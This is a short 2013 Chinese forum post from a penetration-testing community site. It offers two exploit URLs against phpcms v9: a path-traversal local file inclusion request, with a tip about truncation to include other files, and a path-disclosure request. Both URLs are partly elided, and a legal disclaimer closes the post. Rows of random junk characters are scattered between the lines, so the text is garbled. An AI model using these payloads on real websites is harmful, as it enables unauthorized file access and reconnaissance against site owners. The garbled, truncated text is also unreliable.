中国网络渗透测试联盟
标题:
phpcms v9两个鸡肋漏洞
[打印本页]
作者:
admin
时间:
2013-4-4 17:28
标题:
phpcms v9两个鸡肋漏洞
我就不贴代码了,有兴趣的自己跟一下吧,说不定可以发现更多。
9 l$ f5 H3 U. [
9 C1 C$ `% G- f/ D1 v/ ?
Exp:
http://www.php0day.com/api.php?o ... efile=../../../fuck
8 M4 u; ^$ ~- v$ k' R
/ W: O9 z; g/ P$ B* @) V
#包含根目录的fuck.cache.php 又一鸡肋。包含其他文件自己截断吧,看你运气了。
) b1 G0 b" o) x _6 T) R
6 c* a9 O: s7 Z1 m! N
Exp:
http://www.php0day.com/phpcms/mo ... l.php?author=b4dboy
e" W/ d" v0 l% x3 V
3 \) |/ j# V% W# Q
#暴路径
+ U6 I* @- Y) y/ e) L
# j& S. v% s, B: O+ h
注:请遵守国家相关法律,请勿非法入侵,产生任何后果自己负责。
' @- @- r1 k' z( a
" Z/ U( R/ a M2 `: q& L
- C/ n( b$ L3 T2 d( u8 x5 R H) b7 [0 e' x
7 k0 z) n" P4 K4 C' ^
+1
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2